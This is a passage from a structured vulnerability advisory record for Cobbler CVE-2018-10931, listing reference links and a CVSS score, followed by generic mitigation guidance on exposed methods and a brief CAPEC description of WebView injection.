"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:2372"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2018-10931"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1613861"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10931"
},
{
"type": "PACKAGE",
"url": "https://github.com/cobbler/cobbler"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5P5Q4ACIVZ5D4KSUDLGRTOKGGB4U42SD"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CMWK5KCCZXOGOYNR2H6BWDSABTQ5NYJA"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5P5Q4ACIVZ5D4KSUDLGRTOKGGB4U42SD"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CMWK5KCCZXOGOYNR2H6BWDSABTQ5NYJA"
},
{
"type": "WEB",
"url": "https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Cobbler has Exposed Dangerous Method or Function"
}
Mitigation
If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.
Mitigation
Strategy: Attack Surface Reduction
- Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:
- Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting.
- accessible to all users
- restricted to a small set of privileged users
- prevented from being directly accessible at all
CAPEC-500: WebView Injection
An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.